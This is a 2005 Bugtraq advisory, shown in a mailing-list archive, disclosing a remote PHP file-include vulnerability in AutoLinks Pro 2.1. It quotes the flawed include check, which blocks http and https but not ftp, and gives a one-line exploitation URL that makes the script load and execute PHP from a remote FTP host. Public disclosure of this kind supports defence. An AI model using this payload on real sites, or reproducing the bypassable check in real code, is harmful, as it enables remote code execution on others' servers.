lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 28 Aug 2005 18:08:43 -0000 From: none@...e.com To: bugtraq@...urityfocus.com Subject: AutoLinks Pro 2.1 [NewAngels Advisory #1] AutoLinks Pro 2.1 - Remote File Include Vulnerability ============================================================================= Software: AutoLinks Pro Version: 2.1 Type: Remote PHP File Include Vulnerability Risc: High Date: 16.08.05 Vendor: ScriptsCenter Page: http://www.scriptscenter.com/ Credit: ======= Credit goes to NewAngels Team and especially 4Degrees. Description: ============ "AutoLinks 2.1 is a full-featured script making life easier for webmasters relying extensively on link exchanges to bring traffic to their site. Other webmasters are able to easily exchange links with you, bringing more visitors to your site and you also have full control on what sites you want to link." [Quote from http://www.scriptscenter.com/] PHP Requirements: ================= register_globals = On Vulnerability: ============= Related source from file "autolinks/al_initialize.php": >// check for hacking attempt >if(strstr($alpath,"http://") || strstr($alpath,"https://")) exit("Invalid \$alpath variable"); > >include($alpath."al_functions.php"); The script does not check wether $alpath contains an absolute URL to a remote ftp resource. Exploitation: ============= /al_initialize.php?alpath=ftp://host.com/ The code in "al_functions.php" will be executed.
Powered by blists - more mailing lists